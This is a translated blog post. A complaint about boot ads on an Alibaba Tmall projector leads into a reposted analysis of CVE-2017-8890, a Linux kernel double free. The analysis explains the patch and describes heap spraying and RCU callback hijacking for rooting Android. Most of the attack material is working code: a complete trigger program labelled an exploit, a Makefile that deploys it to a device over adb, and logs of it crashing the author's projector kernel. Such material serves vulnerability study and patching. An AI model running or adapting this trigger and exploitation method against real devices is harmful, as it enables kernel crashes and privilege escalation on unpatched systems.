I used to have a pretty good impression of Alibaba's products. I never expected that something like this, a boot-time advertisement, would wipe that impression out.
At first there was no boot ad at all. About three months in, a system update made a boot ad appear. So that is what an "upgrade" amounts to, a boot ad? I filed a complaint right away.
And the result? At most they fixed the point I raised about the ad's volume being scarily loud and not adjustable; the boot ad itself is still there.
Even though the device was only four or five months old and still fairly new, I just took it apart and tossed it aside, then threw it out as garbage when I moved.
So much for Alibaba!
I happened to dig up an old record of mine; since it was just lying around anyway, I'm sharing it.
(Because this is a share of an earlier record, the introductory text at the top was not excerpted; the links to the original sources are in the body.)
Thanks to the experts for sharing, and thanks to the authors of the PoC/EXP code! Shared from open source!
The screenshot of the earlier successful run, added at the top:
-------------------------------------------------------------------------------------------------
CVE-2017-8890
double free
kernel/net/ipv4/inet_connection_sock.c
The patch for CVE-2017-8890 is as follows:
As you can see, the patch is very simple: it adds a single line that sets inet_sk(newsk)->mc_list to NULL. Combined with the vulnerability type, a double free, it is easy to see that the bug must come from the mc_list structure being handled incorrectly during the release path.
(The content below is taken from:)
Analysis and exploitation of CVE-2017-8890 (Root Android 7.x) - FreeBuf (original title: CVE-分析和利用2017-8890漏洞(Root Android 7.x))
Analyzing the patched function inet_csk_clone_lock, as shown below:
The ultimate caller is tcp_v4_rcv, which handles TCP packets. When a three-way handshake completes and a real connection is established, the handshake packets cause a new socket to be created, so the problem arises in the creation of that new socket. The code is as follows:
struct sock *inet_csk_clone_lock(const struct sock *sk, const struct request_sock *req,
const gfp_t priority)
{
struct sock *newsk = sk_clone_lock(sk, priority);
if (newsk) {
// ...
// cve-2017-8890 patch
// inet_sk(newsk)->mc_list = NULL;
// ...
}
// ...
}
struct sock *sk_clone_lock(const struct sock *sk, const gfp_t priority)
{
newsk = sk_prot_alloc(sk->sk_prot, priority, sk->sk_family);
if (newsk != NULL) {
sock_copy(newsk, sk);
// newsk init...
}
return newsk;
}
static void sock_copy(struct sock *nsk, const struct sock *osk)
{
#ifdef CONFIG_SECURITY_NETWORK
void *sptr = nsk->sk_security;
#endif
memcpy(nsk, osk, offsetof(struct sock, sk_dontcopy_begin));
memcpy(&nsk->sk_dontcopy_end, &osk->sk_dontcopy_end,
osk->sk_prot->obj_size - offsetof(struct sock, sk_dontcopy_end));
#ifdef CONFIG_SECURITY_NETWORK
nsk->sk_security = sptr;
security_sk_clone(osk, nsk);
#endif
}
When the new socket is created, sock_copy is called before the object is initialized to copy the parent socket's data over, producing a copy of the parent sock. The subsequent initialization never initializes the mc_list member, so the parent's mc_list object ends up referenced by the new socket object as well. If several sockets are created this way, it is referenced several times, and ultimately the mc_list object is freed several times.
The next question is how to create a socket that carries an mc_list object. Looking at every reference to mc_list in the source, the final call origin is shown below:
ip_mc_join_group adds a socket to a multicast group; its calling interface is ip_setsockopt.
Since the vulnerability type is a double free, the object necessarily can be freed more than once. With the flow for creating the mc_list object in hand, look next at the release flow for that object, shown below:
The vulnerability can now be reproduced; in pseudocode (bind/listen and error handling omitted):
sockfd = socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC, IPPROTO_IP);
setsockopt(sockfd, SOL_IP, MCAST_JOIN_GROUP, &group, sizeof(group));            // allocates mc_list on the listener
accept_sockfd1 = accept(sockfd, (struct sockaddr*)&accept1_si, &accept1_len); // clone 1 inherits the mc_list pointer
accept_sockfd2 = accept(sockfd, (struct sockaddr*)&accept2_si, &accept2_len); // clone 2 inherits the same pointer
// first free
close(accept_sockfd1);
// second free
close(accept_sockfd2);
The crash output is as follows:
[35890.702474] ------------[ cut here ]------------
[35890.702509] kernel BUG at /usr/local/google/buildbot/src/partner-android/n-dev-msm-angler-3.10-nyc-mr2/private/msm-huawei/
mm/slub.c:3364
[35890.702518] Internal error: Oops - BUG: 0 [#1] PREEMPT SMP
[35890.702539] CPU: 0 PID: 8 Comm: rcuc/0 Not tainted 3.10.73-g5b0be8f02fe #1
[35890.702548] task: ffffffc00e9a4b40 ti: ffffffc00e9dc000 task.ti: ffffffc00e9dc000
[35890.702576] PC is at kfree+0xe8/0x1e0
[35890.702594] LR is at rcu_do_batch.isra.35+0x118/0x2b4
[35890.702602] pc : [<ffffffc00030240c>] lr : [<ffffffc000299ab8>] pstate: 40000145
[35890.702608] sp : ffffffc00e9dfc90
[35890.702615] x29: ffffffc00e9dfc90 x28: 00000000000005d7
[35890.702630] x27: ffffffc000ce5000 x26: ffffffc03bffd220
[35890.702641] x25: ffffffc03bffd120 x24: ffffffc00e9dc000
[35890.702653] x23: ffffffc00177f618 x22: ffffffc000299ab8
[35890.702665] x21: ffffffc00160fba8 x20: ffffffc03bffd740
[35890.702677] x19: ffffffbc00efff40 x18: 0000000000000000
[35890.702687] x17: 0000000000000000 x16: 0000000000000001
[35890.702699] x15: 0000000000000000 x14: 0ffffffffffffffe
[35890.702711] x13: 0000000000000030 x12: 0101010101010101
[35890.702722] x11: 7f7f7f7f7f7f7f7f x10: feff676273687672
[35890.702734] x9 : 0000000000000040 x8 : ffffffc0c531be00
[35890.702745] x7 : 00000000000003be x6 : 0000000000000004
[35890.702756] x5 : 0000000000000008 x4 : 0000000000000000
[35890.702767] x3 : ffffffc0c1192450 x2 : 0000000000000000
[35890.702778] x1 : 0000000000efff40 x0 : 0000000000000000
[35890.703639] Process rcuc/0 (pid: 8, stack limit = 0xffffffc00e9dc058)
[35890.703647] Call trace:
[35890.703658] [<ffffffc00030240c>] kfree+0xe8/0x1e0
[35890.703667] [<ffffffc000299ab4>] rcu_do_batch.isra.35+0x114/0x2b4
[35890.703674] [<ffffffc000299dfc>] rcu_cpu_kthread+0x1a8/0x308
[35890.703688] [<ffffffc00024baec>] smpboot_thread_fn+0x1dc/0x208
[35890.703703] [<ffffffc000243e7c>] kthread+0xc0/0xcc
[35890.703713] Code: 37380180 f9400260 f272041f 54000041 (e7f001f2)
[35890.703724] ---[ end trace bc62c72cba08ddfd ]---
[35890.723573] Kernel panic - not syncing: Fatal exception in interrupt
[35890.723810] CPU1: stopping
The principle of this vulnerability is fairly simple: when the object is copied, the pointer is copied along with it, leaving two pointers to the same object. The fix is therefore also simple: set the mc_list pointer to NULL when the object is copied.
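Added example (mine, not code from the FreeBuf write-up, the kernel, or this post): a user-space C model of the shallow-copy bug and its one-line fix described above. The struct and function names are stand-ins for the kernel's, chosen for illustration, and the multicast group value is a constructed sample.

```c
/* Added example, not from the FreeBuf write-up or the kernel: a user-space model
 * of the CVE-2017-8890 pattern. sock_copy() memcpy()s the parent sock, so an
 * unfixed clone shares the parent's mc_list pointer and closing both frees every
 * node twice. The fix clears the pointer on the clone, like the one-line patch. */
#include <stdlib.h>
#include <string.h>
struct mc_node {               /* stands in for struct ip_mc_socklist */
    struct mc_node *next;      /* next_rcu */
    unsigned int group;        /* constructed sample payload */
};
struct sock_model {            /* stands in for struct sock / inet_sock */
    int fd;
    struct mc_node *mc_list;   /* owned list; must never be shared */
};
/* ip_mc_join_group() analogue: allocate a node and push it on the list. */
static int join_group(struct sock_model *sk, unsigned int group)
{
    struct mc_node *iml = malloc(sizeof(*iml));
    if (!iml)
        return -1;
    iml->group = group;
    iml->next = sk->mc_list;
    sk->mc_list = iml;
    return 0;
}
/* sock_copy() analogue as in the vulnerable kernel: a byte-wise copy. */
static void clone_unfixed(struct sock_model *nsk, const struct sock_model *osk)
{
    memcpy(nsk, osk, sizeof(*nsk));  /* mc_list pointer is copied too */
}
/* Same clone with the CVE-2017-8890 fix applied. */
static void clone_fixed(struct sock_model *nsk, const struct sock_model *osk)
{
    memcpy(nsk, osk, sizeof(*nsk));
    nsk->mc_list = NULL;             /* inet_sk(newsk)->mc_list = NULL; */
}
/* ip_mc_drop_socket() analogue: free every node, return how many. */
static int drop_socket(struct sock_model *sk)
{
    int freed = 0;
    while (sk->mc_list) {
        struct mc_node *iml = sk->mc_list;
        sk->mc_list = iml->next;
        free(iml);
        freed++;
    }
    return freed;
}
/* Join a group on the parent, clone it, then close both. Returns nodes freed,
 * or -2 when the clone aliases the parent's list: the second close would be
 * the double free, so it is skipped instead of corrupting the heap. */
static int run_model(int use_fix)
{
    struct sock_model parent = { 3, NULL }, child;
    if (join_group(&parent, 0xe0000000u) != 0)   /* 224.0.0.0 as in the PoC */
        return -1;
    if (use_fix)
        clone_fixed(&child, &parent);
    else
        clone_unfixed(&child, &parent);
    int aliased = child.mc_list != NULL && child.mc_list == parent.mc_list;
    int freed = drop_socket(&parent);                   /* first close() */
    return aliased ? -2 : freed + drop_socket(&child);  /* second close() */
}
```

With the fix both closes together free the single node exactly once; without it the model reports the aliasing that the kernel turns into the kfree BUG shown in the crash log above.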
The exploitation idea is straightforward and direct: heap-spray to reclaim the slot before the second free.
The mc_list object is allocated through the slab allocator; the code is:
int ip_mc_join_group(struct sock *sk, struct ip_mreqn *imr)
{
// ...
iml = sock_kmalloc(sk, sizeof(*iml), GFP_KERNEL);
// ...
}
The corresponding assembly:
ROM:FFFFFFC000BABD6C loc_FFFFFFC000BABD6C ; CODE XREF: ip_mc_join_group+98j
ROM:FFFFFFC000BABD6C MOV X0, X20
ROM:FFFFFFC000BABD70 MOV W1, #0x30
ROM:FFFFFFC000BABD74 MOV W2, #0xD0
ROM:FFFFFFC000BABD78 BL sock_kmalloc
So the object is 0x30 bytes in size and lives in slab-64, which means spraying 64-byte data is enough.
After the heap spray has reclaimed the slot, we need to hijack eip (the author's term; the target is the arm64 program counter), so we need to land on a function pointer inside the object. The mc_list structure is as follows:
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
};
#define rcu_head callback_head
struct ip_mc_socklist {
struct ip_mc_socklist __rcu *next_rcu;
struct ip_mreqn multi;
unsigned int sfmode;
struct ip_sf_socklist __rcu *sflist;
struct rcu_head rcu;
};
The structure contains a callback function pointer, func, so overwriting that pointer hijacks eip. The handling of func happens during object release:
void ip_mc_drop_socket(struct sock *sk)
{
// ...
if (!inet->mc_list)
return;
rtnl_lock();
while ((iml = rtnl_dereference(inet->mc_list)) != NULL) {
// ...
kfree_rcu(iml, rcu);
}
rtnl_unlock();
}
After this function obtains the mc_list object, it finally calls kfree_rcu. That does not actually free the object; it calls call_rcu to queue the object to be deleted and marks or starts a grace period. Once the CPU's grace period ends, an RCU softirq fires and the actual release happens; if there is a callback func, the callback path is taken instead. The full call chain is:
kfree_rcu -> … -> call_rcu -> … -> invoke_rcu_core -> RCU_SOFTIRQ -> rcu_process_callbacks -> … __rcu_reclaim
The final release code is as follows:
#define __is_kfree_rcu_offset(offset) ((offset) < 4096)
static inline bool __rcu_reclaim(const char *rn, struct rcu_head *head)
{
unsigned long offset = (unsigned long)head->func;
rcu_lock_acquire(&rcu_callback_map);
// is there a real callback? small values are a kfree offset, not a function pointer
if (__is_kfree_rcu_offset(offset)) {
RCU_TRACE(trace_rcu_invoke_kfree_callback(rn, head, offset));
kfree((void *)head - offset);
rcu_lock_release(&rcu_callback_map);
return true;
} else {
RCU_TRACE(trace_rcu_invoke_callback(rn, head));
head->func(head);
rcu_lock_release(&rcu_callback_map);
return false;
}
}
The corresponding assembly:
If there is no callback, func is set to the offset of the rcu member within the object, i.e. 0x20; once the func value is greater than 4096, the callback path is taken, i.e. eip is hijacked.
The final exploitation diagram is shown below:
The crash output after hijacking eip is shown in the figure:
Although eip is hijacked, a plain ret2user in the style of early Android privilege escalation would complete the escalation, but PXN protection has long been in place, so a JOP chain has to be built to bypass it. Building JOP requires controlling at least one register, yet the argument when the callback runs is head, i.e. the address of ip_mc_socklist.rcu, which is a kernel address whose contents are not controllable; the value of x0 in the crash output confirms this. At this point the vulnerability still cannot be exploited effectively.
Through deeper study of the mc_list release flow, it turned out that ip_mc_socklist has another important pointer member, next_rcu. In the kernel this pointer points to the next ip_mc_socklist object, and the release flow in ip_mc_drop_socket walks this linked list until next_rcu == NULL. Part of the code:
void ip_mc_drop_socket(struct sock *sk)
{
rtnl_lock();
while ((iml = rtnl_dereference(inet->mc_list)) != NULL) {
inet->mc_list = iml->next_rcu;
kfree_rcu(iml, rcu);
}
rtnl_unlock();
}
Therefore we can forge an ip_mc_socklist object, fake_iml, in user space and, via the heap spray, make the first-freed ip_mc_socklist.next_rcu = fake_iml. When the kernel processes our fake_iml, the final func(head) call is entirely under our control, and head points into user space, so x0 can be controlled. The final exploitation diagram:
With eip and x0 controlled, a JOP chain can be built for the subsequent privilege escalation; the flow is fairly standard and is not detailed here. The final exploit result is shown below; the test phone was a Nexus 6P running 7.12.
Multicast technologies on TCP/IP networks
What is RCU, Fundamentally?
The new locking mechanism in the Linux 2.6 kernel: RCU (Linux 2.6内核中新的锁机制–RCU)
+ Device: Tmall Magic Projector A1 (天猫魔屏A1), Android 5.1.1, Linux localhost 3.14.29 #1 SMP PREEMPT armv7l GNU/Linux
+ Information check: the vulnerability exists in linux-3.14 (it affects versions below 4.10), but it is not yet clear whether it has been fixed on the Magic Projector A1.
+ Reference 1: [Original] CVE-2017-8890 in-depth analysis - Binary vulnerabilities - Pediy forum (bbs.pediy.com)
+ Reference 2: [Original] CVE-2017-8890 exploitation (root nexus6p@kernel 3.10) - Android security - Pediy forum (bbs.pediy.com)
/*
* CVE-2017-8890
* This is a double free vulnerability found by Pray3r using syzkaller from TYA.
*
* -> entry_SYSCALL_64_fastpath() -> SyS_setsockopt() -> SYSC_setsockopt()
* -> sock_common_setsockopt() -> tcp_setsockopt()
* -> ip_setsockopt() -> do_ip_setsockopt() -> do_ip_setsockopt()
* -> ip_mc_join_group() -> sock_kmalloc() -> [...]
*/
/* to use accept4 */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <pthread.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define TEST_PORT 45555
static int cpu_num;
//static int cpu_id;
static int svr_sockfd;
static struct sockaddr_in svr_addr;
static volatile int svr_ready;   /* set by main, polled by cli_thread: volatile keeps the poll loop honest */
static int cli_sockfd[2];
static volatile int cli_finish;  /* set by cli_thread, polled by main */
static void* cli_thread(void *arg)
{
int i = 0, sockfd = -1;
struct sockaddr_in svraddr;
printf("%s: UID=%u, EUID=%u, GID=%u\n", __func__,
getuid(), geteuid(), getgid());
while(!svr_ready)
usleep(1);
memset(&svraddr, 0, sizeof(svraddr));
svraddr.sin_family = AF_INET;
svraddr.sin_port = htons(TEST_PORT);
svraddr.sin_addr.s_addr = inet_addr("127.0.0.1");
for(i=0; i<2; i++) {
sockfd = socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC, IPPROTO_IP);
if(sockfd < 0) {
printf("create client[%d] socket err: %s\n", i, strerror(errno));
continue;
}
printf("create client[%d] socket ok: fd %d\n", i, sockfd);
if(connect(sockfd, (struct sockaddr*)&svraddr, sizeof(svraddr)) < 0) {
printf("client[%d] connect server err: %s\n", i, strerror(errno));
continue;
}
printf("client[%d] connect server ok\n", i);
close(sockfd);
}
printf("client thread exit\n");
cli_finish = 1;
pthread_exit(0);
}
int main(int argc, char *argv[])
{
struct sockaddr_in addr;
struct group_req req;
pthread_t tid;
int i = 0;
/* print info */
cpu_num = sysconf(_SC_NPROCESSORS_CONF);
setbuf(stdout, NULL);
printf("CVE-2017-8890 exploit. cpu_num : %d\n", cpu_num);
printf("Program %s: UID=%u, EUID=%u, GID=%u\n", argv[0],
getuid(), geteuid(), getgid());
/* ------------------------------------------------------- */
svr_sockfd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC , IPPROTO_IP);
if(svr_sockfd < 0) {
printf("create server socket err: %s\n", strerror(errno));
return 0;
}
printf("create server socket %d ok\n", svr_sockfd);
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(TEST_PORT);
addr.sin_addr.s_addr = inet_addr("224.0.0.0"); // multicast address
req.gr_interface = 1;
memcpy(&req.gr_group, &addr, sizeof(addr));
if(setsockopt(svr_sockfd, SOL_IP, MCAST_JOIN_GROUP, &req, sizeof(req)) < 0) {
printf("set server socket join group err: %s\n", strerror(errno));
goto end;
}
printf("server socket join group ok\n");
memset(&svr_addr, 0, sizeof(svr_addr));
svr_addr.sin_family = AF_INET;
svr_addr.sin_port = htons(TEST_PORT);
svr_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
if(bind(svr_sockfd, (struct sockaddr*)&svr_addr, sizeof(svr_addr)) < 0) {
printf("server socket bind port %u err: %s\n", TEST_PORT, strerror(errno));
goto end;
}
printf("server socket bind port %u ok\n", TEST_PORT);
if(listen(svr_sockfd, 2) < 0) {
printf("server socket listen on port %u err: %s\n", TEST_PORT, strerror(errno));
goto end;
}
printf("server socket listening on port %u\n", TEST_PORT);
if(pthread_create(&tid, NULL, cli_thread, NULL) < 0) {
printf("create client thread err: %s\n", strerror(errno));
goto end;
}
printf("create client thread ok\n");
svr_ready = 1;
for(i=0; i<2; i++) {
cli_sockfd[i] = accept4(svr_sockfd, NULL, NULL, 0);
if(cli_sockfd[i] < 0) {
printf("create client thread err: %s\n", strerror(errno));
goto end;
}
printf("accept client[%d] ok: fd %d\n", i, cli_sockfd[i]);
}
printf("wait client thread finish\n");
while(!cli_finish);
printf("client thread finished\n");
printf("[*] now close client[0] fd %d\n", cli_sockfd[0]);
close(cli_sockfd[0]);
printf("[*] prepare close client[1] fd %d\n", cli_sockfd[1]);
close(cli_sockfd[1]);
printf("something ???\n");
sleep(3);
printf("nothing, to exit\n");
end:
close(svr_sockfd);
return 0;
}
Makefile (recipe lines must be indented with a tab):
CROSS = $(shell pwd)/../toolchain_arch64
CROSS_COMPILE = $(CROSS)/bin/aarch64-linux-gnu-
CC = $(CROSS_COMPILE)gcc
STRIP = $(CROSS_COMPILE)strip
TARG = exp
OBJS = main.o
CFLAGS = -Wall
LDFLAGS = -static -pthread
all: $(TARG)
$(TARG): $(OBJS)
	$(CC) $^ $(LDFLAGS) -o $@
	$(STRIP) $@
%.o: %.c
	$(CC) -c $^ $(CFLAGS) -o $@
run: $(TARG)
	@adb connect 192.168.100.2
	@adb push $(TARG) /data/local/tmp/$(TARG) > /dev/null
	@adb shell 'chmod 777 /data/local/tmp/$(TARG)' > /dev/null
	@echo "----- run $(TARG) -----"
	@adb shell /data/local/tmp/$(TARG)
	@echo "----- run end -----"
clean:
	rm -rf *.o $(TARG)
Output of make run on the device, followed by the kernel log:
already connected to 192.168.100.2:5555
----- run exp -----
CVE-2017-8890 exploit. cpu_num : 4
Program /data/local/tmp/exp: UID=2000, EUID=2000, GID=2000
create server socket 3 ok
server socket join group ok
server socket bind port 45555 ok
server socket listening on port 45555
create client thread ok
cli_thread: UID=2000, EUID=2000, GID=2000
create client[0] socket ok: fd 5
accept client[0] ok: fd 4
client[0] connect server ok
create client[1] socket ok: fd 5
accept client[1] ok: fd 6
wait client thread finish
client[1] connect server ok
client thread exit
client thread finished
[*] now close client[0] fd 4
[*] prepare close client[1] fd 6
something ???
nothing, to exit
----- run end -----
shell@MagicProjector_A1:/ $ [ 76.575284] c0 1 (init) init: process 'dhcpcd_eth0', pid 3977 exited
[ 78.577487] c0 5629 (exp) Unable to handle kernel paging request at virtual address deeba000
[ 78.580489] c0 5629 (exp) pgd = ffffffc01815a000
[ 78.587658] [deeba000] *pgd=0000000000000000
[ 78.589677] c0 5629 (exp) Internal error: Oops: 96000005 [#1] PREEMPT SMP
[ 78.595796] Modules linked in: wlan(O) wlan_prealloc(O) mac80211 cfg80211(O) compat(O) dwc3 mali(O)
[ 78.604767] c0 5629 (exp) CPU: 0 PID: 5629 Comm: exp Tainted: G W O 3.14.29-00002-g9d3299d #1
[ 78.613907] c0 5629 (exp) task: ffffffc0225e1000 ti: ffffffc00c9ec000 task.ti: ffffffc00c9ec000
[ 78.622537] c0 5629 (exp) PC is at ip_mc_drop_socket+0x40/0xb4
[ 78.628310] c0 5629 (exp) LR is at ip_mc_drop_socket+0x94/0xb4
[ 78.634088] c0 5629 (exp) pc : [<ffffffc0017f8da4>] lr : [<ffffffc0017f8df8>] pstate: 80000145
[ 78.642626] c0 5629 (exp) sp : ffffffc00c9efd70
[ 78.647110] x29: ffffffc00c9efd70 x28: ffffffc00c9ec000
[ 78.652371] x27: ffffffc001d37000 x26: 0000000000000039
[ 78.657633] x25: 0000000000000116 x24: ffffffc012a90910
[ 78.662894] x23: ffffffc001dee540 x22: ffffffc023f68700
[ 78.668155] x21: 0000000000000000 x20: ffffffc023f68810
[ 78.673416] x19: 00000000deeba000 x18: 000000000049a000
[ 78.678677] x17: 00000000004a2000 x16: ffffffc0011bb9a0
[ 78.683939] x15: 0000000000001000 x14: 0000000000000001
[ 78.689200] x13: 0000000000000000 x12: 0000000000000000
[ 78.694461] x11: 0101010101010101 x10: 7f7f7f7f7f7f7f7f
[ 78.699722] x9 : fefefefefefefeff x8 : 0000000000000039
[ 78.704984] x7 : 0000000000000000 x6 : 0000000000000000
[ 78.710245] x5 : 0000000000000000 x4 : ffffffc023f68810
[ 78.715506] x3 : 0000000000000001 x2 : 0000000000000000
[ 78.720767] x1 : 0000000000000009 x0 : 0000000000002710